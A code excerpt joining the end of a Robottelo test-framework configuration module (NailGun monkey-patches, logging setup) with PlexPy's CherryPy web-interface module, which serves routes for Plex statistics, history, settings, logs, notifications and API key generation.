        entities.GPGKey.__init__ = patched_gpgkey_init

        # NailGun provides a default value for ComputeResource.url. We override
        # that value if `docker.internal_url` or `docker.external_url` is set.
        docker_url = None
        # Try getting internal url
        docker_url = self.docker.get_unix_socket_url()
        # Try getting external url
        if docker_url is None:
            docker_url = self.docker.external_url
        if docker_url is not None:
            # Same closure-based monkey-patch pattern as GPGKey above.
            dockercr_init = entities.DockerComputeResource.__init__

            def patched_dockercr_init(self, server_config=None, **kwargs):
                """Set a default value on the ``docker_url`` field."""
                dockercr_init(self, server_config, **kwargs)
                self._fields['url'].default = docker_url
            entities.DockerComputeResource.__init__ = patched_dockercr_init

    def _configure_logging(self):
        """Configure logging for the entire framework.

        If a config named ``logging.conf`` exists in Robottelo's root
        directory, the logger is configured using the options in that file.
        Otherwise, a custom logging output format is set, and default
        values are used for all other logging options.
        """
        # All output should be made by the logging module, including warnings
        logging.captureWarnings(True)

        # Set the logging level based on the Robottelo's verbosity
        for name in ('nailgun', 'robottelo'):
            logging.getLogger(name).setLevel(self.verbosity)

        # Allow overriding logging config based on the presence of logging.conf
        # file on Robottelo's project root
        logging_conf_path = os.path.join(get_project_root(), 'logging.conf')
        if os.path.isfile(logging_conf_path):
            config.fileConfig(logging_conf_path)
        else:
            logging.basicConfig(
                format='%(levelname)s %(module)s:%(lineno)d: %(message)s'
            )

    def _configure_third_party_logging(self):
        """Increase the level of third party packages logging.

        Raising these loggers to WARNING silences their chatty INFO/DEBUG
        output during test runs.
        """
        loggers = (
            'bugzilla',
            'easyprocess',
            'paramiko',
            'requests.packages.urllib3.connectionpool',
            'selenium.webdriver.remote.remote_connection',
        )
        for logger in loggers:
            logging.getLogger(logger).setLevel(logging.WARNING)
gnowxilef/plexpy
plexpy/webserve.py
# This file is part of PlexPy.
#
# PlexPy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PlexPy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PlexPy. If not, see <http://www.gnu.org/licenses/>.

from plexpy import logger, notifiers, plextv, pmsconnect, common, log_reader, datafactory, graphs, users
from plexpy.helpers import checked, radio

from mako.lookup import TemplateLookup
from mako import exceptions

import plexpy
import threading
import cherrypy
import hashlib
import random
import json
import os

try:
    # pylint:disable=E0611
    # ignore this error because we are catching the ImportError
    from collections import OrderedDict
    # pylint:enable=E0611
except ImportError:
    # Python 2.6.x fallback, from libs
    from ordereddict import OrderedDict


def serve_template(templatename, **kwargs):
    """Render a Mako template from the configured interface directory.

    On any rendering/lookup failure an HTML-formatted Mako error page is
    returned instead of raising.
    """
    interface_dir = os.path.join(str(plexpy.PROG_DIR), 'data/interfaces/')
    template_dir = os.path.join(str(interface_dir), plexpy.CONFIG.INTERFACE)

    _hplookup = TemplateLookup(directories=[template_dir])

    try:
        template = _hplookup.get_template(templatename)
        return template.render(**kwargs)
    # NOTE(review): bare except swallows every failure (including
    # KeyboardInterrupt); the error page hides the real traceback.
    except:
        return exceptions.html_error_template().render()


class WebInterface(object):
    """CherryPy handler class: every @cherrypy.expose method is a URL route."""

    def __init__(self):
        # Base data directory; used e.g. by pms_image_proxy for fallbacks.
        self.interface_dir = os.path.join(str(plexpy.PROG_DIR), 'data/')

    @cherrypy.expose
    def index(self):
        """Root URL: send users to the home page, or the setup wizard."""
        if plexpy.CONFIG.FIRST_RUN_COMPLETE:
            raise cherrypy.HTTPRedirect("home")
        else:
            raise cherrypy.HTTPRedirect("welcome")

    @cherrypy.expose
    def home(self):
        """Render the dashboard with the home-stats configuration."""
        config = {
            "home_stats_length": plexpy.CONFIG.HOME_STATS_LENGTH,
            "home_stats_type": plexpy.CONFIG.HOME_STATS_TYPE,
            "home_stats_count": plexpy.CONFIG.HOME_STATS_COUNT,
            "pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER,
        }
        return serve_template(templatename="index.html", title="Home", config=config)

    @cherrypy.expose
    def welcome(self, **kwargs):
        """Render the first-run setup wizard (or redirect home if done)."""
        config = {
            "launch_browser": checked(plexpy.CONFIG.LAUNCH_BROWSER),
            "refresh_users_on_startup": checked(plexpy.CONFIG.REFRESH_USERS_ON_STARTUP),
            "pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER,
            "pms_ip": plexpy.CONFIG.PMS_IP,
            "pms_is_remote": checked(plexpy.CONFIG.PMS_IS_REMOTE),
            "pms_port": plexpy.CONFIG.PMS_PORT,
            "pms_token": plexpy.CONFIG.PMS_TOKEN,
            "pms_ssl": checked(plexpy.CONFIG.PMS_SSL),
            "pms_uuid": plexpy.CONFIG.PMS_UUID,
            "tv_notify_enable": checked(plexpy.CONFIG.TV_NOTIFY_ENABLE),
            "movie_notify_enable": checked(plexpy.CONFIG.MOVIE_NOTIFY_ENABLE),
            "music_notify_enable": checked(plexpy.CONFIG.MUSIC_NOTIFY_ENABLE),
            "tv_notify_on_start": checked(plexpy.CONFIG.TV_NOTIFY_ON_START),
            "movie_notify_on_start": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_START),
            "music_notify_on_start": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_START),
            "video_logging_enable": checked(plexpy.CONFIG.VIDEO_LOGGING_ENABLE),
            "music_logging_enable": checked(plexpy.CONFIG.MUSIC_LOGGING_ENABLE),
            "logging_ignore_interval": plexpy.CONFIG.LOGGING_IGNORE_INTERVAL,
            "check_github": checked(plexpy.CONFIG.CHECK_GITHUB)
        }

        # The setup wizard just refreshes the page on submit so we must redirect to home if config set.
        # Also redirecting to home if a PMS token already exists - will remove this in future.
        if plexpy.CONFIG.FIRST_RUN_COMPLETE or plexpy.CONFIG.PMS_TOKEN:
            raise cherrypy.HTTPRedirect("home")
        else:
            return serve_template(templatename="welcome.html", title="Welcome", config=config)

    @cherrypy.expose
    def get_date_formats(self):
        """Return the configured date/time display formats as JSON."""
        if plexpy.CONFIG.DATE_FORMAT:
            date_format = plexpy.CONFIG.DATE_FORMAT
        else:
            date_format = 'YYYY-MM-DD'
        if plexpy.CONFIG.TIME_FORMAT:
            time_format = plexpy.CONFIG.TIME_FORMAT
        else:
            time_format = 'HH:mm'

        formats = {'date_format': date_format,
                   'time_format': time_format}

        cherrypy.response.headers['Content-type'] = 'application/json'
        return json.dumps(formats)

    @cherrypy.expose
    def home_stats(self, time_range='30', stat_type='0', stat_count='5', **kwargs):
        """Render the home-statistics partial for the given range/type/count."""
        data_factory = datafactory.DataFactory()
        stats_data = data_factory.get_home_stats(time_range=time_range, stat_type=stat_type, stat_count=stat_count)

        return serve_template(templatename="home_stats.html", title="Stats", data=stats_data)

    @cherrypy.expose
    def library_stats(self, **kwargs):
        """Render library statistics pulled from the Plex Media Server."""
        pms_connect = pmsconnect.PmsConnect()
        stats_data = pms_connect.get_library_stats()

        return serve_template(templatename="library_stats.html", title="Library Stats", data=stats_data)

    @cherrypy.expose
    def history(self):
        return serve_template(templatename="history.html", title="History")

    @cherrypy.expose
    def users(self):
        return serve_template(templatename="users.html", title="Users")

    @cherrypy.expose
    def graphs(self):
        return serve_template(templatename="graphs.html", title="Graphs")

    @cherrypy.expose
    def sync(self):
        return serve_template(templatename="sync.html", title="Synced Items")

    @cherrypy.expose
    def user(self, user=None, user_id=None):
        """Render a single user's page; user_id takes precedence over user.

        Redirects home when neither identifier is supplied.
        """
        user_data = users.Users()
        if user_id:
            try:
                user_details = user_data.get_user_details(user_id=user_id)
            except:
                logger.warn("Unable to retrieve friendly name for user_id %s " % user_id)
        elif user:
            try:
                user_details = user_data.get_user_details(user=user)
            except:
                logger.warn("Unable to retrieve friendly name for user %s " % user)
        else:
            logger.debug(u"User page requested but no parameters received.")
            raise cherrypy.HTTPRedirect("home")

        return serve_template(templatename="user.html", title="User", data=user_details)

    @cherrypy.expose
    def edit_user_dialog(self, user=None, user_id=None, **kwargs):
        """Render the edit-user modal pre-populated with the friendly name."""
        user_data = users.Users()
        if user_id:
            result = user_data.get_user_friendly_name(user_id=user_id)
            status_message = ''
        elif user:
            result = user_data.get_user_friendly_name(user=user)
            status_message = ''
        else:
            result = None
            status_message = 'An error occured.'

        return serve_template(templatename="edit_user.html", title="Edit User", data=result, status_message=status_message)

    @cherrypy.expose
    def edit_user(self, user=None, user_id=None, friendly_name=None, **kwargs):
        """Persist user edits (friendly name, notify/history flags, avatar).

        Unchecked HTML checkboxes are absent from kwargs, hence the 0
        defaults. Returns a plain status string consumed by the UI.
        """
        if 'do_notify' in kwargs:
            do_notify = kwargs.get('do_notify')
        else:
            do_notify = 0
        if 'keep_history' in kwargs:
            keep_history = kwargs.get('keep_history')
        else:
            keep_history = 0
        if 'thumb' in kwargs:
            custom_avatar = kwargs['thumb']
        else:
            custom_avatar = ''

        user_data = users.Users()
        if user_id:
            try:
                user_data.set_user_friendly_name(user_id=user_id,
                                                 friendly_name=friendly_name,
                                                 do_notify=do_notify,
                                                 keep_history=keep_history)
                user_data.set_user_profile_url(user_id=user_id,
                                               profile_url=custom_avatar)

                status_message = "Successfully updated user."
                return status_message
            except:
                status_message = "Failed to update user."
                return status_message
        if user:
            try:
                user_data.set_user_friendly_name(user=user,
                                                 friendly_name=friendly_name,
                                                 do_notify=do_notify,
                                                 keep_history=keep_history)
                user_data.set_user_profile_url(user=user,
                                               profile_url=custom_avatar)

                status_message = "Successfully updated user."
                return status_message
            except:
                status_message = "Failed to update user."
                return status_message

    @cherrypy.expose
    def get_stream_data(self, row_id=None, user=None, **kwargs):
        """Render stream details for one history row."""
        data_factory = datafactory.DataFactory()
        stream_data = data_factory.get_stream_details(row_id)

        return serve_template(templatename="stream_data.html", title="Stream Data", data=stream_data, user=user)

    @cherrypy.expose
    def get_ip_address_details(self, ip_address=None, **kwargs):
        """Render the IP-address modal; invalid IPv4 input becomes None."""
        import socket

        try:
            # inet_aton raises socket.error for anything not IPv4 dotted-quad.
            socket.inet_aton(ip_address)
        except socket.error:
            ip_address = None

        return serve_template(templatename="ip_address_modal.html", title="IP Address Details", data=ip_address)

    @cherrypy.expose
    def get_user_list(self, **kwargs):
        """Return the DataTables-style user list as JSON."""
        user_data = users.Users()
        user_list = user_data.get_user_list(kwargs=kwargs)

        cherrypy.response.headers['Content-type'] = 'application/json'
        return json.dumps(user_list)

    @cherrypy.expose
    def checkGithub(self):
        """Trigger an update check against GitHub, then go home."""
        from plexpy import versioncheck

        versioncheck.checkGithub()
        raise cherrypy.HTTPRedirect("home")

    @cherrypy.expose
    def logs(self):
        return serve_template(templatename="logs.html", title="Log", lineList=plexpy.LOG_LIST)

    @cherrypy.expose
    def clearLogs(self):
        """Empty the in-memory log buffer and return to the log page."""
        plexpy.LOG_LIST = []
        logger.info("Web logs cleared")
        raise cherrypy.HTTPRedirect("logs")

    @cherrypy.expose
    def toggleVerbose(self):
        """Flip verbose logging at runtime and re-initialise the logger."""
        plexpy.VERBOSE = not plexpy.VERBOSE
        logger.initLogger(console=not plexpy.QUIET,
                          log_dir=plexpy.CONFIG.LOG_DIR, verbose=plexpy.VERBOSE)
        logger.info("Verbose toggled, set to %s", plexpy.VERBOSE)
        logger.debug("If you read this message, debug logging is available")
        raise cherrypy.HTTPRedirect("logs")

    @cherrypy.expose
    def getLog(self, start=0, length=100, **kwargs):
        """Serve a DataTables page of the in-memory log.

        Supports DataTables' server-side params: search[value], order[0][dir],
        order[0][column]. Rows are [time, level, message] triples internally;
        columns are swapped on output for display order.
        """
        start = int(start)
        length = int(length)
        search_value = ""
        search_regex = ""
        order_column = 0
        order_dir = "desc"

        if 'order[0][dir]' in kwargs:
            order_dir = kwargs.get('order[0][dir]', "desc")

        if 'order[0][column]' in kwargs:
            order_column = kwargs.get('order[0][column]', "0")

        if 'search[value]' in kwargs:
            search_value = kwargs.get('search[value]', "")

        if 'search[regex]' in kwargs:
            search_regex = kwargs.get('search[regex]', "")

        filtered = []
        if search_value == "":
            filtered = plexpy.LOG_LIST[::]
        else:
            # Case-insensitive substring match across every column.
            filtered = [row for row in plexpy.LOG_LIST for column in row if search_value.lower() in column.lower()]

        sortcolumn = 0
        if order_column == '1':
            sortcolumn = 2
        elif order_column == '2':
            sortcolumn = 1
        filtered.sort(key=lambda x: x[sortcolumn], reverse=order_dir == "desc")

        rows = filtered[start:(start + length)]
        rows = [[row[0], row[2], row[1]] for row in rows]

        return json.dumps({
            'recordsFiltered': len(filtered),
            'recordsTotal': len(plexpy.LOG_LIST),
            'data': rows,
        })

    @cherrypy.expose
    def get_plex_log(self, window=1000, **kwargs):
        """Return the tail of the Plex Media Server log as JSON."""
        log_lines = []
        try:
            log_lines = {'data': log_reader.get_log_tail(window=window)}
        except:
            logger.warn("Unable to retrieve Plex Logs.")

        cherrypy.response.headers['Content-type'] = 'application/json'
        return json.dumps(log_lines)

    @cherrypy.expose
    def generateAPI(self):
        """Generate and return a new 32-char API key (not yet persisted).

        NOTE(review): random.getrandbits is not a CSPRNG; os.urandom would be
        preferable for an API credential.
        """
        apikey = hashlib.sha224(str(random.getrandbits(256))).hexdigest()[0:32]
        logger.info("New API generated")
        return apikey

    @cherrypy.expose
    def settings(self):
        """Render the settings page with every current config value."""
        interface_dir = os.path.join(plexpy.PROG_DIR, 'data/interfaces/')
        interface_list = [name for name in os.listdir(interface_dir) if
                          os.path.isdir(os.path.join(interface_dir, name))]

        # Initialise blank passwords so we do not expose them in the html forms
        # but users are still able to clear them
        # (a single-space value is the "unchanged" sentinel checked by
        # configUpdate below).
        if plexpy.CONFIG.HTTP_PASSWORD != '':
            http_password = ' '
        else:
            http_password = ''

        config = {
            "http_host": plexpy.CONFIG.HTTP_HOST,
            "http_username": plexpy.CONFIG.HTTP_USERNAME,
            "http_port": plexpy.CONFIG.HTTP_PORT,
            "http_password": http_password,
            "launch_browser": checked(plexpy.CONFIG.LAUNCH_BROWSER),
            "enable_https": checked(plexpy.CONFIG.ENABLE_HTTPS),
            "https_cert": plexpy.CONFIG.HTTPS_CERT,
            "https_key": plexpy.CONFIG.HTTPS_KEY,
            "api_enabled": checked(plexpy.CONFIG.API_ENABLED),
            "api_key": plexpy.CONFIG.API_KEY,
            "update_db_interval": plexpy.CONFIG.UPDATE_DB_INTERVAL,
            "freeze_db": checked(plexpy.CONFIG.FREEZE_DB),
            "log_dir": plexpy.CONFIG.LOG_DIR,
            "cache_dir": plexpy.CONFIG.CACHE_DIR,
            "check_github": checked(plexpy.CONFIG.CHECK_GITHUB),
            "interface_list": interface_list,
            "growl_enabled": checked(plexpy.CONFIG.GROWL_ENABLED),
            "growl_host": plexpy.CONFIG.GROWL_HOST,
            "growl_password": plexpy.CONFIG.GROWL_PASSWORD,
            "prowl_enabled": checked(plexpy.CONFIG.PROWL_ENABLED),
            "prowl_keys": plexpy.CONFIG.PROWL_KEYS,
            "prowl_priority": plexpy.CONFIG.PROWL_PRIORITY,
            "xbmc_enabled": checked(plexpy.CONFIG.XBMC_ENABLED),
            "xbmc_host": plexpy.CONFIG.XBMC_HOST,
            "xbmc_username": plexpy.CONFIG.XBMC_USERNAME,
            "xbmc_password": plexpy.CONFIG.XBMC_PASSWORD,
            "plex_enabled": checked(plexpy.CONFIG.PLEX_ENABLED),
            "plex_client_host": plexpy.CONFIG.PLEX_CLIENT_HOST,
            "plex_username": plexpy.CONFIG.PLEX_USERNAME,
            "plex_password": plexpy.CONFIG.PLEX_PASSWORD,
            "nma_enabled": checked(plexpy.CONFIG.NMA_ENABLED),
            "nma_apikey": plexpy.CONFIG.NMA_APIKEY,
            "nma_priority": int(plexpy.CONFIG.NMA_PRIORITY),
            "pushalot_enabled": checked(plexpy.CONFIG.PUSHALOT_ENABLED),
            "pushalot_apikey": plexpy.CONFIG.PUSHALOT_APIKEY,
            "pushover_enabled": checked(plexpy.CONFIG.PUSHOVER_ENABLED),
            "pushover_keys": plexpy.CONFIG.PUSHOVER_KEYS,
            "pushover_apitoken": plexpy.CONFIG.PUSHOVER_APITOKEN,
            "pushover_priority": plexpy.CONFIG.PUSHOVER_PRIORITY,
            "pushbullet_enabled": checked(plexpy.CONFIG.PUSHBULLET_ENABLED),
            "pushbullet_apikey": plexpy.CONFIG.PUSHBULLET_APIKEY,
            "pushbullet_deviceid": plexpy.CONFIG.PUSHBULLET_DEVICEID,
            "twitter_enabled": checked(plexpy.CONFIG.TWITTER_ENABLED),
            "osx_notify_enabled": checked(plexpy.CONFIG.OSX_NOTIFY_ENABLED),
            "osx_notify_app": plexpy.CONFIG.OSX_NOTIFY_APP,
            "boxcar_enabled": checked(plexpy.CONFIG.BOXCAR_ENABLED),
            "boxcar_token": plexpy.CONFIG.BOXCAR_TOKEN,
            "cache_sizemb": plexpy.CONFIG.CACHE_SIZEMB,
            "email_enabled": checked(plexpy.CONFIG.EMAIL_ENABLED),
            "email_from": plexpy.CONFIG.EMAIL_FROM,
            "email_to": plexpy.CONFIG.EMAIL_TO,
            "email_smtp_server": plexpy.CONFIG.EMAIL_SMTP_SERVER,
            "email_smtp_user": plexpy.CONFIG.EMAIL_SMTP_USER,
            "email_smtp_password": plexpy.CONFIG.EMAIL_SMTP_PASSWORD,
            "email_smtp_port": int(plexpy.CONFIG.EMAIL_SMTP_PORT),
            "email_tls": checked(plexpy.CONFIG.EMAIL_TLS),
            "pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER,
            "pms_ip": plexpy.CONFIG.PMS_IP,
            "pms_logs_folder": plexpy.CONFIG.PMS_LOGS_FOLDER,
            "pms_port": plexpy.CONFIG.PMS_PORT,
            "pms_token": plexpy.CONFIG.PMS_TOKEN,
            "pms_ssl": checked(plexpy.CONFIG.PMS_SSL),
            "pms_use_bif": checked(plexpy.CONFIG.PMS_USE_BIF),
            "pms_uuid": plexpy.CONFIG.PMS_UUID,
            "plexwatch_database": plexpy.CONFIG.PLEXWATCH_DATABASE,
            "date_format": plexpy.CONFIG.DATE_FORMAT,
            "time_format": plexpy.CONFIG.TIME_FORMAT,
            "grouping_global_history": checked(plexpy.CONFIG.GROUPING_GLOBAL_HISTORY),
            "grouping_user_history": checked(plexpy.CONFIG.GROUPING_USER_HISTORY),
            "grouping_charts": checked(plexpy.CONFIG.GROUPING_CHARTS),
            "tv_notify_enable": checked(plexpy.CONFIG.TV_NOTIFY_ENABLE),
            "movie_notify_enable": checked(plexpy.CONFIG.MOVIE_NOTIFY_ENABLE),
            "music_notify_enable": checked(plexpy.CONFIG.MUSIC_NOTIFY_ENABLE),
            "tv_notify_on_start": checked(plexpy.CONFIG.TV_NOTIFY_ON_START),
            "movie_notify_on_start": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_START),
            "music_notify_on_start": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_START),
            "tv_notify_on_stop": checked(plexpy.CONFIG.TV_NOTIFY_ON_STOP),
            "movie_notify_on_stop": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_STOP),
            "music_notify_on_stop": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_STOP),
            "tv_notify_on_pause": checked(plexpy.CONFIG.TV_NOTIFY_ON_PAUSE),
            "movie_notify_on_pause": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_PAUSE),
            "music_notify_on_pause": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_PAUSE),
            "monitoring_interval": plexpy.CONFIG.MONITORING_INTERVAL,
            "refresh_users_interval": plexpy.CONFIG.REFRESH_USERS_INTERVAL,
            "refresh_users_on_startup": checked(plexpy.CONFIG.REFRESH_USERS_ON_STARTUP),
            "ip_logging_enable": checked(plexpy.CONFIG.IP_LOGGING_ENABLE),
            "video_logging_enable": checked(plexpy.CONFIG.VIDEO_LOGGING_ENABLE),
            "music_logging_enable": checked(plexpy.CONFIG.MUSIC_LOGGING_ENABLE),
            "logging_ignore_interval": plexpy.CONFIG.LOGGING_IGNORE_INTERVAL,
            "pms_is_remote": checked(plexpy.CONFIG.PMS_IS_REMOTE),
            "notify_watched_percent": plexpy.CONFIG.NOTIFY_WATCHED_PERCENT,
            "notify_on_start_subject_text": plexpy.CONFIG.NOTIFY_ON_START_SUBJECT_TEXT,
            "notify_on_start_body_text": plexpy.CONFIG.NOTIFY_ON_START_BODY_TEXT,
            "notify_on_stop_subject_text": plexpy.CONFIG.NOTIFY_ON_STOP_SUBJECT_TEXT,
            "notify_on_stop_body_text": plexpy.CONFIG.NOTIFY_ON_STOP_BODY_TEXT,
            "notify_on_pause_subject_text": plexpy.CONFIG.NOTIFY_ON_PAUSE_SUBJECT_TEXT,
            "notify_on_pause_body_text": plexpy.CONFIG.NOTIFY_ON_PAUSE_BODY_TEXT,
            "notify_on_resume_subject_text": plexpy.CONFIG.NOTIFY_ON_RESUME_SUBJECT_TEXT,
            "notify_on_resume_body_text": plexpy.CONFIG.NOTIFY_ON_RESUME_BODY_TEXT,
            "notify_on_buffer_subject_text": plexpy.CONFIG.NOTIFY_ON_BUFFER_SUBJECT_TEXT,
            "notify_on_buffer_body_text": plexpy.CONFIG.NOTIFY_ON_BUFFER_BODY_TEXT,
            "notify_on_watched_subject_text": plexpy.CONFIG.NOTIFY_ON_WATCHED_SUBJECT_TEXT,
            "notify_on_watched_body_text": plexpy.CONFIG.NOTIFY_ON_WATCHED_BODY_TEXT,
            "home_stats_length": plexpy.CONFIG.HOME_STATS_LENGTH,
            "home_stats_type": checked(plexpy.CONFIG.HOME_STATS_TYPE),
            "home_stats_count": plexpy.CONFIG.HOME_STATS_COUNT,
            "buffer_threshold": plexpy.CONFIG.BUFFER_THRESHOLD,
            "buffer_wait": plexpy.CONFIG.BUFFER_WAIT
        }

        return serve_template(templatename="settings.html", title="Settings", config=config)

    @cherrypy.expose
    def configUpdate(self, **kwargs):
        """Persist the settings form, then reschedule/refresh as needed."""
        # Handle the variable config options. Note - keys with False values aren't getting passed
        checked_configs = [
            "launch_browser", "enable_https", "api_enabled", "freeze_db", "growl_enabled",
            "prowl_enabled", "xbmc_enabled", "check_github", "plex_enabled", "nma_enabled",
            "pushalot_enabled", "pushover_enabled", "pushbullet_enabled", "twitter_enabled",
            "osx_notify_enabled", "boxcar_enabled", "email_enabled", "email_tls",
            "grouping_global_history", "grouping_user_history", "grouping_charts", "pms_use_bif", "pms_ssl",
            "tv_notify_enable", "movie_notify_enable", "music_notify_enable",
            "tv_notify_on_start", "movie_notify_on_start", "music_notify_on_start",
            "tv_notify_on_stop", "movie_notify_on_stop", "music_notify_on_stop",
            "tv_notify_on_pause", "movie_notify_on_pause", "music_notify_on_pause", "refresh_users_on_startup",
            "ip_logging_enable", "video_logging_enable", "music_logging_enable", "pms_is_remote", "home_stats_type"
        ]
        for checked_config in checked_configs:
            if checked_config not in kwargs:
                # checked items should be zero or one. if they were not sent then the item was not checked
                kwargs[checked_config] = 0

        # If http password exists in config, do not overwrite when blank value received
        if 'http_password' in kwargs:
            if kwargs['http_password'] == ' ' and plexpy.CONFIG.HTTP_PASSWORD != '':
                kwargs['http_password'] = plexpy.CONFIG.HTTP_PASSWORD

        for plain_config, use_config in [(x[4:], x) for x in kwargs if x.startswith('use_')]:
            # the use prefix is fairly nice in the html, but does not match the actual config
            kwargs[plain_config] = kwargs[use_config]
            del kwargs[use_config]

        # Check if we should refresh our data
        refresh_users = False
        reschedule = False

        if 'monitoring_interval' in kwargs and 'refresh_users_interval' in kwargs:
            if (kwargs['monitoring_interval'] != str(plexpy.CONFIG.MONITORING_INTERVAL)) or \
                    (kwargs['refresh_users_interval'] != str(plexpy.CONFIG.REFRESH_USERS_INTERVAL)):
                reschedule = True

        if 'pms_ip' in kwargs:
            if kwargs['pms_ip'] != plexpy.CONFIG.PMS_IP:
                refresh_users = True

        plexpy.CONFIG.process_kwargs(kwargs)

        # Write the config
        plexpy.CONFIG.write()

        # Get new server URLs for SSL communications.
        plextv.get_real_pms_url()

        # Reconfigure scheduler if intervals changed
        if reschedule:
            plexpy.initialize_scheduler()

        # Refresh users table if our server IP changes.
        if refresh_users:
            threading.Thread(target=plextv.refresh_users).start()

        raise cherrypy.HTTPRedirect("settings")

    @cherrypy.expose
    def set_notification_config(self, **kwargs):
        """Persist notification-only settings posted from the UI."""
        # Handle the variable config options. Note - keys with False values aren't getting passed
        checked_configs = [
            "email_tls"
        ]
        for checked_config in checked_configs:
            if checked_config not in kwargs:
                # checked items should be zero or one. if they were not sent then the item was not checked
                kwargs[checked_config] = 0

        for plain_config, use_config in [(x[4:], x) for x in kwargs if x.startswith('use_')]:
            # the use prefix is fairly nice in the html, but does not match the actual config
            kwargs[plain_config] = kwargs[use_config]
            del kwargs[use_config]

        plexpy.CONFIG.process_kwargs(kwargs)

        # Write the config
        plexpy.CONFIG.write()

        cherrypy.response.status = 200

    @cherrypy.expose
    def do_state_change(self, signal, title, timer):
        """Set the global shutdown/restart/update signal and show a countdown page."""
        message = title
        quote = self.random_arnold_quotes()
        plexpy.SIGNAL = signal

        return serve_template(templatename="shutdown.html", title=title,
                              message=message, timer=timer, quote=quote)

    @cherrypy.expose
    def get_history(self, user=None, user_id=None, **kwargs):
        """Return watch history as JSON, optionally filtered.

        NOTE(review): each successive filter kwarg *replaces* custom_where
        rather than combining with it — only the last matching filter applies.
        """
        custom_where = []
        if user_id:
            custom_where = [['user_id', user_id]]
        elif user:
            custom_where = [['user', user]]
        if 'rating_key' in kwargs:
            rating_key = kwargs.get('rating_key', "")
            custom_where = [['rating_key', rating_key]]
        if 'parent_rating_key' in kwargs:
            rating_key = kwargs.get('parent_rating_key', "")
            custom_where = [['parent_rating_key', rating_key]]
        if 'grandparent_rating_key' in kwargs:
            rating_key = kwargs.get('grandparent_rating_key', "")
            custom_where = [['grandparent_rating_key', rating_key]]
        if 'start_date' in kwargs:
            start_date = kwargs.get('start_date', "")
            custom_where = [['strftime("%Y-%m-%d", datetime(date, "unixepoch", "localtime"))', start_date]]

        data_factory = datafactory.DataFactory()
        history = data_factory.get_history(kwargs=kwargs, custom_where=custom_where)

        cherrypy.response.headers['Content-type'] = 'application/json'
        return json.dumps(history)

    @cherrypy.expose
    def history_table_modal(self, start_date=None, **kwargs):
        return serve_template(templatename="history_table_modal.html", title="History Data", data=start_date)

    @cherrypy.expose
    def shutdown(self):
        return self.do_state_change('shutdown', 'Shutting Down', 15)

    @cherrypy.expose
    def restart(self):
        return self.do_state_change('restart', 'Restarting', 30)
    @cherrypy.expose
    def update(self):
        """Trigger an update: show the countdown page and set the 'update' signal."""
        return self.do_state_change('update', 'Updating', 120)

    @cherrypy.expose
    def api(self, *args, **kwargs):
        """Entry point for the HTTP API: validate parameters, then return the payload."""
        from plexpy.api import Api

        a = Api()
        a.checkParams(*args, **kwargs)

        return a.fetchData()

    @cherrypy.expose
    def twitterStep1(self):
        """Begin Twitter OAuth: return the authorization URL (response not cached)."""
        cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
        tweet = notifiers.TwitterNotifier()
        return tweet._get_authorization()

    @cherrypy.expose
    def twitterStep2(self, key):
        """Finish Twitter OAuth: exchange the verifier `key` for credentials."""
        cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
        tweet = notifiers.TwitterNotifier()
        result = tweet._get_credentials(key)
        logger.info(u"result: " + str(result))
        if result:
            return "Key verification successful"
        else:
            return "Unable to verify key"

    @cherrypy.expose
    def testTwitter(self):
        """Send a test tweet and report success/failure as plain text."""
        cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
        tweet = notifiers.TwitterNotifier()
        result = tweet.test_notify()
        if result:
            return "Tweet successful, check your twitter to make sure it worked"
        else:
            return "Error sending tweet"

    @cherrypy.expose
    def osxnotifyregister(self, app):
        """Register `app` for OS X notifications and confirm with a test notification."""
        cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store"
        from osxnotify import registerapp as osxnotify
        result, msg = osxnotify.registerapp(app)
        if result:
            osx_notify = notifiers.OSX_NOTIFY()
            osx_notify.notify('Registered', result, 'Success :-)')
            logger.info('Registered %s, to re-register a different app, delete this app first' % result)
        else:
            logger.warn(msg)
        # NOTE(review): msg may be undefined on the success path if registerapp
        # only sets it on failure — confirm registerapp's return contract.
        return msg

    @cherrypy.expose
    def get_pms_token(self):
        """Return the Plex.tv auth token, or False when it cannot be retrieved."""
        token = plextv.PlexTV()
        result = token.get_token()
        if result:
            return result
        else:
            logger.warn('Unable to retrieve Plex.tv token.')
            return False

    @cherrypy.expose
    def get_pms_sessions_json(self, **kwargs):
        """Return the current PMS sessions as JSON, or False on failure."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_sessions('json')
        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')
            return False

    @cherrypy.expose
    def get_current_activity(self, **kwargs):
        """Render the current-activity template; render the empty state on any error."""
        try:
            pms_connect = pmsconnect.PmsConnect()
            result = pms_connect.get_current_activity()
        except:
            # NOTE(review): bare except deliberately renders the empty template
            # rather than a 500 — it also hides programming errors.
            return serve_template(templatename="current_activity.html", data=None)

        if result:
            return serve_template(templatename="current_activity.html", data=result)
        else:
            logger.warn('Unable to retrieve data.')
            return serve_template(templatename="current_activity.html", data=None)

    @cherrypy.expose
    def get_current_activity_header(self, **kwargs):
        """Render the activity header (stream count only); empty state on IOError."""
        try:
            pms_connect = pmsconnect.PmsConnect()
            result = pms_connect.get_current_activity()
        except IOError, e:  # Python 2 except syntax; file is py2 throughout
            return serve_template(templatename="current_activity_header.html", data=None)

        if result:
            return serve_template(templatename="current_activity_header.html", data=result['stream_count'])
        else:
            logger.warn('Unable to retrieve data.')
            return serve_template(templatename="current_activity_header.html", data=None)

